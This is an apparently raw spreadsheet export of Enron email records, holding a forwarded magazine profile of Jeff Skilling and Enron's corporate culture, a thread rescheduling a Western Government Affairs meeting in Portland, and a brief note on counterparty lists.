ENRON, JEFF SKILLING SAYS, HAD "a totally different way of thinking about b=_x000D_
usiness-we got it." At Enron, in fact, you either "got it" or you were gone=_x000D_
-it was as simple as black and white. It is not coincidental, then, that th=_x000D_
e color scheme of Skilling's River Oaks mansion mirrors the corporation he =_x000D_
once headed. Here, the living room's white walls shimmer against the mahoga=_x000D_
ny floors. Black leather trims the edge of snowy carpets. Billowy sofas set=_x000D_
 off the jet-black baby grand. In the entry, white orchids cascade from a b=_x000D_
lack vase on a black pedestal table that in turn pools onto cold, white mar=_x000D_
ble. There is only one off-color note: After almost twenty years, Jeff Skil=_x000D_
ling is no longer associated with Enron, having resigned abruptly after jus=_x000D_
t six months as CEO. Once, Skilling was hailed as the next Jack Welch (Gene=_x000D_
ral Electric's masterful CEO), as one of Worth magazine's best CEO's in Ame=_x000D_
rica (anointed in 2001), and even as a daredevil who hosted the kind of unc=_x000D_
hained adventure junkets in which, a friend told BusinessWeek, "someone cou=_x000D_
ld actually get killed." Today, he sounds more like Ebenezer Scrooge on Chr=_x000D_
istmas morning. "I had no idea what I'd let go of," Skilling says of all th=_x000D_
e personal sacrifices he made while retooling Enron.=20_x000D_
_x000D_
From a black chair in the white library, across from a huge black and white=_x000D_
 photograph of his daughter and two sons, Skilling clarifies. The demands o=_x000D_
f working 24-7 for Enron caused him to ignore his personal finances. Divorc=_x000D_
ed, he lived in a 2,200-square-foot house without a microwave or a dishwash=_x000D_
er. He almost missed his brother's wedding. "Learning a foreign language-I =_x000D_
never learned a foreign language!" he exclaims. He never once took his youn=_x000D_
gest son to school. "I'm interested in the kids. You don't do kids in fifte=_x000D_
en-minute scheduling." Travel: "You can't go to Africa for a week and get a=_x000D_
nything out of it!" Skilling includes the study of architecture and design =_x000D_
on his list of missed opportunities, then he stops and sighs. "I'm not sure=_x000D_
 that fulfillment in life is compatible with a CEO's job," he says, finally=_x000D_
. Then his eyes lock on mine, and his voice, which had softened, regains it=_x000D_
s pragmatic edge. "It would have been easy to stay," he says. "But that wou=_x000D_
ld not have been good for me."=20_x000D_
_x000D_
He's a smallish, ruddy-faced man who keeps himself at fighting weight, hand=_x000D_
some in the way of corporate titans, with piercing cheekbones and that assi=_x000D_
duously stolid gaze. But the impatience Skilling once reserved for cautious=_x000D_
 underlings and dull-witted utility company executives is now targeted at r=_x000D_
eporters who have labeled his resignation "bizarre" and associates who are =_x000D_
bitterly skeptical of his need for family time. His shrug stretches the lim=_x000D_
its of his shimmering blue button-down, and his matching blue eyes look put=_x000D_
 upon. "I'm surprised," he says, "that people have so much trouble understa=_x000D_
nding this."_x000D_
_x000D_
PEOPLE WHO PASSED THROUGH DOWNTOWN HOUSTON in the late eighties or early ni=_x000D_
neties couldn't help but notice a funny and, for its time, novel scene unfo=_x000D_
lding throughout the workday at the base of the Enron Building. From nine t=_x000D_
o five and before and after, you could see people slipping out of the prist=_x000D_
ine silver skyscraper to smoke. They perched on the chrome banisters or lur=_x000D_
ked near the glass doors at the entry, puffing like mad. They always looked=_x000D_
 hurried and furtive, even ashamed. Whatever people knew about Enron in tho=_x000D_
se days (and most people didn't know much), it was often associated with th=_x000D_
at scene: Enron boasted one of the first nonsmoking corporate headquarters =_x000D_
in Houston, and there couldn't have been clearer evidence of its break with=_x000D_
 the energy world of the past. What macho engineer would have put up with s=_x000D_
uch humiliation?_x000D_
_x000D_
But this company was a child of another time, that period in the mid-eighti=_x000D_
es when chaos enveloped the gas business. Federal deregulation of natural g=_x000D_
as turned a steady, secure industry, in which gas pipeline companies freque=_x000D_
ntly enjoyed a monopoly in portions of the areas that they served, into a v=_x000D_
olatile free-for-all. The situation was compounded five years later by fede=_x000D_
ral deregulation of the pipeline business. So it happened that a gentlemanl=_x000D_
y gas pipeline company, Houston Natural Gas (HNG) found itself under attack=_x000D_
 from Coastal Corporation, Oscar Wyatt's less than gentlemanly firm. HNG wa=_x000D_
s then run by Lay, a sturdy, taciturn former economics professor and Transc=_x000D_
o chief operating officer who had a passion for military strategy. (His doc=_x000D_
toral thesis at the University of Houston was on supply and demand in the V=_x000D_
ietnam War.) Lay, who was from Missouri and never succumbed-at least outwar=_x000D_
dly-to Texas brashness, had done well enough: Thanks to canny expansions, H=_x000D_
NG's pipelines stretched from Florida to California and throughout the stat=_x000D_
e of Texas._x000D_
_x000D_
HNG fended off Coastal, but to protect the company from other takeover atte=_x000D_
mpts, Lay nimbly engineered the sale of HNG in 1985 to a friendly Nebraska =_x000D_
pipeline concern called InterNorth, one of the largest pipeline companies i=_x000D_
n the country at the time. Then, a funny thing happened: HNG started acting=_x000D_
 in a way that would characterize the company for years to come-a lot like =_x000D_
Coastal. What the Nebraskans blithely labeled "the purchase" was being call=_x000D_
ed "the merger" back in Houston, and before long, following some particular=_x000D_
ly brutal politicking between Omaha and Houston, the company's center of gr=_x000D_
avity started shifting toward Texas, and shortly after that, Ken Lay was ru=_x000D_
nning a new company called Enron. "Over time it became clear that Lay had a=_x000D_
 better vision of the future," says one person associated with Enron at tha=_x000D_
t time. "He never fought change. He embraced change."_x000D_
_x000D_
Lay had won, but what exactly did that mean? Enron was saddled with massive=_x000D_
 debt from the takeover attempt, and thanks to deregulation, no longer had =_x000D_
exclusive use of its pipelines. Without new ideas-for that matter, a whole =_x000D_
new business plan-the company could be finished before it really even got s=_x000D_
tarted.=20_x000D_
_x000D_
LIKE MANY PEOPLE WHO TEAMED UP WITH ENRON IN THE EIGHTIES, Jeff Skilling ha=_x000D_
d spent a lot of time in the Midwest, and he was self-made-at fourteen he h=_x000D_
ad been the chief production director at a start-up TV station in Aurora, I=_x000D_
llinois. (His mother would drop him off there every day after school.) "I l=_x000D_
iked being successful when I was working, and I was smart," he told Busines=_x000D_
sWeek earlier this year. But unlike many of his Enron colleagues, Skilling =_x000D_
wasn't deliberate and soft-spoken and happy to go home at five o'clock; he =_x000D_
was anxious and excitable, and nothing, but nothing excited him more than w=_x000D_
hat he would come to call "intellectual capital." He loved being smart, and=_x000D_
 he loved being surrounded by smart people. He graduated from Southern Meth=_x000D_
odist University, went into banking-assets and liability management-and too=_x000D_
k on Harvard Business School, where he graduated in the top 5 percent of hi=_x000D_
s class. Then Skilling took the next step on what was then the new, souped-=_x000D_
up path to American success: He joined Manhattan's McKinsey and Company as =_x000D_
a business consultant, and that is where Ken Lay found him in 1985.=20_x000D_
_x000D_
It is often said of Lay that his instincts for hiring the best are flawless=_x000D_
, and his choice of Skilling probably saved the company. Skilling was above=_x000D_
 all an expert at markets and how they worked. While everyone else was worr=_x000D_
ying about the gluts and the shortages that defined the gas industry, he al=_x000D_
one saw the parallels between gas and other businesses. And so in a world w=_x000D_
here credit was nearly impossible to come by, Skilling came up with what he=_x000D_
 called the Gas Bank, which contractually guaranteed both the supply and th=_x000D_
e price of gas to a network of suppliers and consumers. Enron would not be =_x000D_
a broker but a banker. It would buy and sell the gas itself and assume the =_x000D_
risk involved. And Enron would make money on transactions, much like an inv=_x000D_
estment bank would._x000D_
_x000D_
Skilling worked up some numbers and found them "absolutely compelling." The=_x000D_
n the McKinsey consultant took the idea to a meeting of about 25 Enron exec=_x000D_
utives. He had a one-page presentation. "Almost to a person," Skilling says=_x000D_
, "they thought it was stupid." Almost. After Skilling left the meeting dej=_x000D_
ected, he walked Ken Lay to an elevator and apologized. Lay listened and th=_x000D_
en said, "Let's go."_x000D_
_x000D_
The Gas Bank was not an overnight success. For months Skilling woke up in a=_x000D_
 cold sweat, sure he had ruined not only his career but the careers of doze=_x000D_
ns of colleagues who had assisted him. In fact, he had come upon one of tho=_x000D_
se divides that seem to define his life: "I believed this whole world would=_x000D_
 be different, a huge breakthrough" is the way Skilling puts it today, and =_x000D_
even if he is typically immodest, he was right. Fairly soon after launching=_x000D_
, the company sold $800 million worth of gas in a week. True to Skilling's =_x000D_
character, success turned out to be a matter of old versus new: He says the=_x000D_
 joke around Enron was that if a company's CEO was under fifty, "We were in=_x000D_
." And he was in too: In 1990 Skilling finally left McKinsey and joined Enr=_x000D_
on as the head of Enron Finance Corporation, a new division created just fo=_x000D_
r him. In 1991 that company closed a deal that earned $11 million in profit=_x000D_
. After that, says Skilling, "we never looked back."_x000D_
_x000D_
Skilling and Lay also realized that the Gas Bank couldn't work unless it ha=_x000D_
d a trading component. Myriad trades were needed to build the market that w=_x000D_
ould make the project go. But by buying and selling enormous quantities of =_x000D_
gas, Enron not only constructed a market but almost instantly came to domin=_x000D_
ate it. The company had the best contacts, the best intelligence, and the b=_x000D_
est access to supplies. That, in turn, attracted more customers who wanted =_x000D_
to be part of the play. With so many customers in its pocket, Enron could b=_x000D_
etter predict the direction of the market and could use that knowledge to m=_x000D_
ake trades for its own benefit-Enron could in effect bet on which way the p=_x000D_
rice of gas would go, as one might do with pork bellies or soybeans, but wi=_x000D_
th startling accuracy, thereby generating profits higher than anyone could =_x000D_
have ever imagined._x000D_
_x000D_
=20_x000D_
_x000D_
THIS CHANGE COULD NEVER HAVE OCCURRED without another change Skilling had m=_x000D_
ade: He created, within Enron, a new culture to match its new trading busin=_x000D_
ess. The idea was to build a "knowledge-based business," which demanded a s=_x000D_
kill set not exactly prized by Enron's employees from the old HNG days. Mos=_x000D_
t were deliberate, cautious, responsible, somewhat defensive people, most o=_x000D_
f them men, of course-the kind of people you'd expect to find working in an=_x000D_
 industry regulated by the federal government. But now the company needed b=_x000D_
older people for its bold new era: that included anyone who wanted to make =_x000D_
money-lots of money-for themselves and for the company. "Enron was going to=_x000D_
 create a niche for itself or die," one former executive explains. "The peo=_x000D_
ple who had narrow views eventually were forced out, because if they had na=_x000D_
rrow views about other things, they had narrow views about the market."_x000D_
_x000D_
Skilling wanted smart people but not just any smart people. He wanted the s=_x000D_
martest people from schools like Harvard, Stanford, and maybe, Rice. And be=_x000D_
cause his firm was now acting more like a bank than a pipeline company, he =_x000D_
wanted to draw from the pool of recruits that would be attracted to the big=_x000D_
gest and best investment banks, like Merrill Lynch or Credit Suisse First B=_x000D_
oston. In addition to being smart, Enron people were also supposed to be "a=_x000D_
ggressive." You were right for Enron if you didn't want to wait until you w=_x000D_
ere thirty to close your own deals or move up in an organization.=20_x000D_
_x000D_
You could see what he was looking for on "Super Saturdays" at the Houston h=_x000D_
eadquarters: eight fifty-minute interviews with ten minute breaks in betwee=_x000D_
n-the company might herd as many as four hundred people through in just one=_x000D_
 day. They were scored from 1 to 5 on their smarts, their problem-solving a=_x000D_
bility, their passion for hard work, and what at Enron was called "a sense =_x000D_
of urgency." People who scored less than 2.5 were scratched. The shrewdest =_x000D_
candidates knew how to work Enron before they were even hired: These were t=_x000D_
he types that automatically turned down the company's first offer, knowing =_x000D_
Enron would come back with more. The starting salary was around $80,000. Ma=_x000D_
ybe it wasn't a fortune-yet-but the signing bonus, about $20,000, was more =_x000D_
than enough for a lease on the obligatory Porsche Boxster or one of the lof=_x000D_
ts being renovated close to downtown. (Enron people didn't live in far-flun=_x000D_
g suburbs. Suburbs were uncool and too far from the office.)_x000D_
_x000D_
For the lucky winners, Enron offered the corporate equivalent of a gifted-a=_x000D_
nd-talented program. New associates learned the latest techniques for struc=_x000D_
turing energy deals, and there were rotations at Enron offices around the g=_x000D_
lobe. The hours were long, but every possible need was taken care of. A com=_x000D_
pany concierge handled all the things important people couldn't be bothered=_x000D_
 with: picking up dry cleaning or prescriptions, shining shoes, cleaning th=_x000D_
e house, planning a vacation. Of course, a lot of people who worked for Enr=_x000D_
on never got to take vacations-they were too busy making money-but they cou=_x000D_
ld use the company gym and the company's personal trainers. If they were ov=_x000D_
erweight or wanted to quit smoking, they could join Enron's Wellness Progra=_x000D_
m. Massages were offered six days a week, from seven in the morning until t=_x000D_
en at night. "They were so cutting edge," rhapsodizes someone involved with=_x000D_
 the company health care program at the time. "They really thought about th=_x000D_
e psychology and what it took to keep these people going."_x000D_
_x000D_
Skilling handed out titles analogous to those at Wall Street firms-analysts=_x000D_
, associates, directors, and managing directors-but everyone knew that thos=_x000D_
e titles didn't really matter. Money did. Instead of competitive salaries a=_x000D_
nd decent bonuses, Enron offered competitive salaries and merit-based bonus=_x000D_
es-with no cap. "If you really worked hard and delivered results, you could=_x000D_
 make a lot of money," says Ken Rice, who stayed with Enron for 21 years un=_x000D_
til resigning recently as the head of the company's faltering broadband div=_x000D_
ision. Or, as the saying goes, you got to eat what you killed. Gas traders =_x000D_
with two or three years of experience could wind up with a $1 million bonus=_x000D_
. And the more you produced, the closer you got to Jeff: Real hot dogs join=_x000D_
ed him glacier hiking in Patagonia, Land Cruiser racing in Australia, or of=_x000D_
f-road motorcycling in a re-creation of the Baja 1,000 race, ending at a sp=_x000D_
ectacular Mexican villa. "Every time he'd speak, I'd believe everything he'=_x000D_
d say," one loyalist says.=20_x000D_
_x000D_
And why not? By 1995 Enron had become North America's largest natural-gas m=_x000D_
erchant, controlling 20 percent of the market. But at a company where the b=_x000D_
uzzword was "aggressive," that was no place to stop: Skilling and Lay belie=_x000D_
ved the Gas Bank model could easily be applied to the electricity business.=_x000D_
 Firmly committed to the notion that a deregulated market meant better serv=_x000D_
ice at lower prices for consumers (and untold profits for Enron), they bega=_x000D_
n barnstorming the country, pressing their case with entrenched power compa=_x000D_
ny presidents (who, with their multimillion-dollar salaries and monopoly se=_x000D_
rvice areas, had little incentive to change) and energy regulators (who wer=_x000D_
e somewhat more receptive, thanks in part to Enron's generous lobbying effo=_x000D_
rts)._x000D_
_x000D_
But the biggest winner of all was probably Jeff Skilling. In 1997 Ken Lay m=_x000D_
ade him the president and chief operating officer of the company. By then, =_x000D_
the division known as Enron Capital and Trade Resources was the nations lar=_x000D_
gest wholesale buyer and seller of natural gas and electricity. The divisio=_x000D_
n had grown from two hundred to two thousand employees, and revenues from $=_x000D_
2 billion to $7 billion. "Mr. Skilling's experience so far with the turmoil=_x000D_
 in the industry has convinced him that he is on the right track," the New =_x000D_
York Times noted. Everyone would certainly have thought so: Enron and Skill=_x000D_
ing had totally transformed one industry and were well on their way to tran=_x000D_
sforming another._x000D_
_x000D_
"FIRING UP AN IDEA MACHINE; Enron Is Encouraging the Entrepreneurs Within,"=_x000D_
 sang the New York Times in 1999. "In the staid world of regulated utilitie=_x000D_
s and energy companies, Enron Corp is that gate-crashing Elvis," crowed For=_x000D_
tune in 2000. Wall Street was demanding tech-size growth on a tech timetabl=_x000D_
e, and Enron, in 2000, obliged with second quarter earnings of $289 million=_x000D_
, up 30 percent from the previous year. That year the company seemed to dis=_x000D_
cover a market a minute: Under Skilling, Enron was trading coal, paper, ste=_x000D_
el, and even weather. No one blinked when a London wine bar became an Enron=_x000D_
 client. People drank more in warm weather than cold, so why not buy a hedg=_x000D_
e against the usual winter downturn?_x000D_
_x000D_
But most exciting to the financial world was Enron's entry into high-tech c=_x000D_
ommunications. Because of the company's marketing dominance, EnronOnline be=_x000D_
came another overnight success, handling $335 billion in commodity trades o=_x000D_
nline in 2000. Enron, as usual, made its money on the spread between the bi=_x000D_
d price and the asking price. Then there was the broadband business: To Enr=_x000D_
on, trading excess capacity in large, high-speed fiber-optic networks (empt=_x000D_
y lanes on the fabled information highway) wasn't that different from tradi=_x000D_
ng the capacity of natural gas pipelines. So Enron created a market for wha=_x000D_
t the industry calls bandwidth. Soon after, it also announced a twenty-year=_x000D_
 deal with Blockbuster to deliver movies on demand electronically to people=_x000D_
 in their homes. Enron looked like a company that couldn't lose. "Its strat=_x000D_
egy of building businesses, shedding hard assets, and trading various commo=_x000D_
dities can help it do well even in an uncertain market," BusinessWeek insis=_x000D_
ted._x000D_
_x000D_
There was, however, another reason Enron did so well in such a short time: =_x000D_
the company's hard-nosed approach toward its customers. The old notion of c=_x000D_
ustomer service was based on the long haul-you had to nurse and coddle cust=_x000D_
omers to keep them. But Enron had new markets and new ideas-customers had t=_x000D_
o come to it. Over time, the company stopping referring to its business cli=_x000D_
ents as customers and began calling them "counterparties."_x000D_
_x000D_
Skilling wanted the biggest profits on the shortest timetable: Gains were m=_x000D_
aximized by creating, owning, and then abandoning a market before it became=_x000D_
 overtaxed and overregulated. So if you wanted to launch a high-risk ventur=_x000D_
e quickly-such as Zilkha Energy's new high-tech approach to drilling for oi=_x000D_
l-you got your financing from Enron because a bank would take forever to un=_x000D_
derwrite the project, if it ever would. But because Enron invented its mark=_x000D_
ets and subsequently dominated them, Enron could set the terms of its deals=_x000D_
, from the timeline to the method of accounting to whether the deal happene=_x000D_
d at all.=20_x000D_
_x000D_
While many businesses used what was known in the industry as "mark-to-marke=_x000D_
t accounting," for instance, Enron used it on an unprecedented scale. The c=_x000D_
ompany priced their deals at current market value-but it was always Enron's=_x000D_
 idea of the market value; companies that balked at their pricing didn't ge=_x000D_
t deals. And while old-fashioned companies spread their profits out like an=_x000D_
nuities over a period of years, Enron took most of its profit up-front. How=_x000D_
ever many millions would be made on a deal that covered several years, they=_x000D_
 went on the books in the current year. If a few analysts thought there mig=_x000D_
ht be something fishy about what they called "subjective accounting," inves=_x000D_
tors didn't particularly care as long as the profits rolled in. As the mark=_x000D_
et fluctuated and the landscape changed, the company might abandon a projec=_x000D_
t that had been in the works for months because its profit margins weren't =_x000D_
going to be high enough. "Enron is known for leaving people at the altar," =_x000D_
says one former employee. Winning the highest possible profits for the comp=_x000D_
any could even extend to Enron's attitude toward charity. When a fundraiser=_x000D_
 for the Houston READ Commission, a literacy group, called on Enron for a c=_x000D_
ontribution, it was suggested that he start raising money for Enron's compe=_x000D_
ting literacy charity: "Even the person who was supposed to give money away=_x000D_
 for Enron was supposed to make money for Enron," he says._x000D_
_x000D_
As Enron became more and more successful, the culture Skilling had created =_x000D_
took on a dark side: The competition turned inward. As one member of the En=_x000D_
ron family put it, "It became a company full of mercenaries." The change st=_x000D_
arted at the bottom. As Enron's domination of the energy market grew, most =_x000D_
of the recruiting frills fell away. New associates were treated much like t=_x000D_
he commodities the company traded. Global Change's Enron spies reported ove=_x000D_
rhearing orders like "I need a smart person-go buy me one" or "Buy me an in=_x000D_
telligent slave, quick." Enron had never been the kind of place where peopl=_x000D_
e sang to you on your birthday, but now the workaholism bordered on self-pa=_x000D_
rody: A Random Acts of Kindness program lasted only a few months. It was to=_x000D_
o disruptive. People couldn't get their work done._x000D_
_x000D_
And, of course, Enron had a program for institutionalizing creative tension=_x000D_
. The Performance Review Committee, which had initially been installed by S=_x000D_
killing in the Capital group, became known as the harshest forced ranking s=_x000D_
ystem in the country. Employees were rated on a scale of one to five, and t=_x000D_
hose with fives were usually gone within six months. (The PRC's nickname qu=_x000D_
ickly became "rank and yank.") It was a point of pride that Skilling's divi=_x000D_
sion replaced 15 percent of its workforce every year. As one Skilling assoc=_x000D_
iate put it, "Jeff viewed this like turning over the inventory in a grocery=_x000D_
 store." Skilling's approach to business-get in and get out-had become Enro=_x000D_
n's attitude toward its workers. In time, it would become many workers' att=_x000D_
itude toward the company. Teamwork, never that valuable in a trading cultur=_x000D_
e, went the way of the eyeshade and the abacus. If protocol required an Enr=_x000D_
on higher-up to come from Europe to help with a project in the Third World,=_x000D_
 he might help-or he might not, depending on whether another, potentially m=_x000D_
ore lucrative project was pending elsewhere._x000D_
_x000D_
Everyone felt the pressure to perform on a massive scale at massive speed: =_x000D_
"They were so goal oriented toward immediate gratification that they lost s=_x000D_
ight of the future," says one former employee. Anyone who couldn't close de=_x000D_
als within a quarter was punished with bad PRC scores, as were the higher-u=_x000D_
ps who had backed them. Past errors and old grudges were dredged up so ofte=_x000D_
n as new ammunition in PRC meetings that the phrase "No old tapes" became a=_x000D_
n Enron clich?. "People went from being geniuses to idiots overnight," says=_x000D_
 one former Enron executive._x000D_
_x000D_
In such a hothouse, paranoia flowered. New contracts contained highly restr=_x000D_
ictive confidentiality agreements about anything pertaining to the company.=_x000D_
 E-mail was monitored. A former executive routinely carried two laptops, on=_x000D_
e for the company and one for himself. People may have been rich at Enron, =_x000D_
but they weren't necessarily happy. One recruiter described the culture thi=_x000D_
s way: "They roll you over and slit your throat and watch your eyes while y=_x000D_
ou bleed to death."_x000D_
_x000D_
BEFORE JEFF SKILLING COULD TRANSFORM ENRON from the world's leading energy =_x000D_
company into the world's leading company, he had to make one more change: J=_x000D_
ust as he had done ten years before, Skilling had to purge the company of i=_x000D_
ts remaining old order. Where Enron once prized cautious executives who dea=_x000D_
lt with tangible assets like pipelines, it now valued bold executives who d=_x000D_
ealt with intangible assets. Pipelines, power plants-they may have been Enr=_x000D_
on's pride, but Skilling wanted them gone. Expensive, long-term building pr=_x000D_
ojects had no place when Wall Street was devoted to quick profits and enorm=_x000D_
ous returns on investment capital, and Skilling knew it. "It wasn't the tim=_x000D_
e for long-term approaches," an Enron executive says of Wall Street's mood.=_x000D_
 "It was the technology era."_x000D_
_x000D_
To rid Enron of the last vestiges of its past, Skilling had to take on Rebe=_x000D_
cca Mark, long considered his rival for the CEO's job. Mark was for many ye=_x000D_
ars the poster child for the Enron way: Young, attractive, aggressive-her n=_x000D_
ickname was Mark the Shark-she came from sturdy Midwestern stock but had th=_x000D_
e requisite Harvard MBA. Mark was largely responsible for the success of En=_x000D_
ron International, the asset-heavy side of the company where she developed =_x000D_
$20 billion worth of gas and power plants, which accounted for 40 percent o=_x000D_
f Enron's profits in 1998. For this she reaped breathtaking compensation-on=_x000D_
e Enron executive estimated $10 million-and adoring press clips, including =_x000D_
two appearances on Fortune's list of the fifty most powerful women in corpo=_x000D_
rate America._x000D_
_x000D_
But then Mark ran into trouble with a gas-fired power plant in Dabhol, Indi=_x000D_
a, one of the largest ever constructed. She had played the game the Enron w=_x000D_
ay: Taking Enron into a new market, she had finagled low import taxes (20 p=_x000D_
ercent instead of the usual 53) and hung in through 24 lawsuits and three c=_x000D_
hanges in government. But the time and expense needed to make India and oth=_x000D_
er Enron plants around the globe successful did not mesh with Enron's goals=_x000D_
, and Skilling's impatience with Mark grew._x000D_
_x000D_
Forcing Mark out, however, was no easy matter. Key executives left, divisio=_x000D_
ns were dismantled, but she remained. The truth was Enron didn't mind firin=_x000D_
g lower-level employees, but it hated to fire the kind of aggressive, relen=_x000D_
tless people it tended to promote. The company preferred humiliation-keepin=_x000D_
g a director in his cubicle, say, but failing to include him in the glamour=_x000D_
 deals, or kicking someone upstairs with a fancy title. (One particularly d=_x000D_
ifficult executive won a few years at graduate school, gratis.) A company a=_x000D_
s smart as Enron could probably deduce too that dispatching one of the most=_x000D_
 visible businesswomen in the country would provoke a public-relations disa=_x000D_
ster. So Lay and Skilling did something classically Enronian: They gave Mar=_x000D_
k her own company. Despite Skilling's contempt for asset-heavy businesses, =_x000D_
Enron spent more than $2 billion to buy a run-of-the-mill British water uti=_x000D_
lity that could serve as Enron's entry into the emerging world of water pri=_x000D_
vatization. Mark was put in charge of making Enron, yes, the world's greate=_x000D_
st water company. Azurix, as the new business was called, looked like anoth=_x000D_
er sure thing: Its IPO in 1999 raised $695 million.=20_x000D_
_x000D_
But Mark had to succeed on Enron's increasingly abbreviated timetable in a =_x000D_
business fraught wit</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 09:21:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'sarah.novosel@enron.com', 'l..nicolay@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'jeff.dasovich@enron.com', "e-mail &lt;'.'lysa@enron.com&gt;", 'legal &lt;.hall@enron.com&gt;', 'm..landwehr@enron.com', 'd..steffes@enron.com', 'debra.davidson@enron.com', "e-mail &lt;'.'karen@enron.com&gt;"})</t>
  </si>
  <si>
    <t>RE: RE-SCHEDULING A RE-SCHEDULED WESTERN REGION MEETING!!!!!</t>
  </si>
  <si>
    <t>I was concerned about having to have the Washington DC and Houston people travel on Sunday. When I checked schedules, I found that Delta 443/759 (Dp 6:45 am -- Connect Cincinnati -- Ar 11:07) might work on Monday for the Washington people.  From Houston, 1647/1063 (Dp 8:05 am -- Connect Salt Lake -- Ar 11:59am) would work to avoid Sunday travel.  United probably has similar offerings through Denver.  If people prefer non-stop Continental flights, Sunday flights are probably needed.  _x000D_
_x000D_
Steve_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Perrino, Dave  _x000D_
Sent:	Tuesday, August 28, 2001 8:31 PM_x000D_
To:	Comnes, Alan; Nicolay, Christi L.; Steffes, James D.; Dasovich, Jeff; Lysa Tracy (E-mail); Karen Denne (E-mail); Alvarez, Ray; Novosel, Sarah; Hall, Steve C. (Legal); Walton, Steve; Davidson, Debra; Landwehr, Susan M._x000D_
Subject:	RE-SCHEDULING A RE-SCHEDULED WESTERN REGION MEETING!!!!!_x000D_
Importance:	High_x000D_
_x000D_
Dear Western Government Affairs folk,_x000D_
_x000D_
This message is to request you check your calendars and your availability for a western region meeting in Portland to be held on Monday October 1, starting at 12:00 PM through 6PM and Tuesday October 2 from 8:00 AM through 12:00 PM.  Please let me know whether or not you can make the proposed dates.  (Lysa and Debra, can you please check Paul and Tim's calendars for their availability?)_x000D_
_x000D_
For those of you who had planned on attending in September, I am sorry to again cause you this inconvenience.   Hopefully for everyone who wanted to attend, but couldn't, this will offer you the opportunity to participate on October 1 and 2._x000D_
_x000D_
Due to the volume of new policy related issues in our region since the meeting was originally scheduled, I would expect there will be some modifications to our previously distributed agenda below.  When  you have an opportunity, please review the agenda below and send any updates to me asap so I can formalize the agenda and distribute it to the group._x000D_
_x000D_
_x000D_
Dear All,_x000D_
_x000D_
As a result of the recent volume of activity in Washington DC, with mediation proceedings, refund discussions and the need for key members of our team that need to attend these meetings, it has been decided to re-schedule the meeting of the Western Government Affairs group to Wednesday, September 12, in Portland, 10AM-5PM._x000D_
_x000D_
For those of you who had planned on attending, I am sorry to cause you this inconvenience.  Hopefully for those of you who wanted to attend, but couldn't, this will offer you the opportunity to participate on September 12._x000D_
_x000D_
Due to the volatility of policy related issues in our region, I would expect there may be some modifications to our current agenda below.  As these changes occur I will communicate this information to you._x000D_
_x000D_
Any questions or concerns, please contact me._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; 	  From:  Dave Perrino                           07/20/2001 09:36 AM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Steve Walton/ENRON@enronXgate, Alan Comnes/PDX/ECT@Enron, Christi L Nicolay/HOU/ECT@ECT, Debra Davidson/ENRON@enronXgate, James D Steffes/NA/Enron@Enron, Paul Kaufman/ENRON@enronXgate, Ray Alvarez/NA/Enron@ENRON, Sarah Novosel/Corp/Enron@ENRON, Steve C Hall/ENRON@enronXgate, Steve Walton/HOU/ECT@Enron, Karen Denne/ENRON@enronXgate_x000D_
cc:	Lysa Tracy/ENRON@enronXgate, Debra Davidson/Enron@EnronXGate _x000D_
_x000D_
Subject:	Draft Agenda for - Western Government Affairs Meeting_x000D_
_x000D_
Below is a draft agenda for our planned meeting on Wednesday August 1 in Portland Oregon from 10-5.  Tim Belden will be joining us from11:30-1PM (thanks Debra) and the agenda is taking Tim's time into account.  We will be meeting in the Mt. Hood Room, a working lunch will be provided (thanks Lysa).  _x000D_
_x000D_
If you would like to modify the agenda, please send your edits to me._x000D_
_x000D_
10:00  	Meeting called to order - Brief Introductions - All_x000D_
10:10  	Overview of Western Government Affairs Priorities (Jim or designee?)_x000D_
11:00  	What are the short-term needs of our Western Commerical Staff? (Alan?)_x000D_
11:30  	Brief Overview of July 12 Rulings and discussion of the potential impacts on the West (Ray/Christi/Sarah? and Group)_x000D_
12:30  	RTO/ISO Status Update (in alphabetical order)_x000D_
		CAISO			(Sue)_x000D_
		DSTAR			(Dave)_x000D_
		RTO West		(Steve)_x000D_
2:00	RTO Strategy discussion "How we move forward and how we should leverage the recent FERC July 12 rulings"  			(Group/Jim?)_x000D_
3:30	Meetings, RTO's and WSCC	-	Ranking and Coverage coordination (Group)_x000D_
4:30	Northwest OASIS "Enhancements" - Solicitation of Trader Comments (Dave)  (Note, Alan, can you please ask Diana, 		Sean and Bill Williams III to see if they can schedule time to attend?)_x000D_
_x000D_
While developing this agenda from everyone's input I was thinking that NERC is beginning to assert more and more influence (good or bad) on the entire industry.  I would like to know if our group feels it would be useful to invite either Charles Yeung or Andy Rodriquez to our meeting to overview NERC activities and or Electronic Scheduling?_x000D_
_x000D_
Also, if Steve Hall has any legal or contract issues he'd like to discuss during our meeting I'll be happy to add time for that._x000D_
_x000D_
Again, as noted above this is a draft and as you can see I have un-democratically nominated (suggested) folks for leading various discussions.  Any comments or confirmations of commitment to lead an agenda item would be greatly appreciated.  Thanks for everyone's input._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
David F. Perrino_x000D_
Director, Government Affairs_x000D_
Enron Corporation_x000D_
101 California Street, Suite 1950_x000D_
San Francisco, CA  94111_x000D_
Phone: 415.782.7801_x000D_
Fax: 415.782.7854_x000D_
Mobile: 415.794.8740</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 08:16:39 -0800 (PST)</t>
  </si>
  <si>
    <t>1/31 In the Money CP's</t>
  </si>
  <si>
    <t>Elena,_x000D_
_x000D_
Yesterday's list of in the money CP's did not change.  We will forward a list of out of the money CP's shortly.  We will also send IT the list so that they can begin moving them to another book.  There are appox 140 CP's so the move will take some time._x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 01:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'roberto.martinez@enron.com', 'lenine.jeganathan@enron.com', 'allison.easton@enron.com', 'eric.bass@enron.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>FW: Crime at Christmas</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Brian T. Hoskins_x000D_
Enron Broadband Services_x000D_
713-853-0380 (office)_x000D_
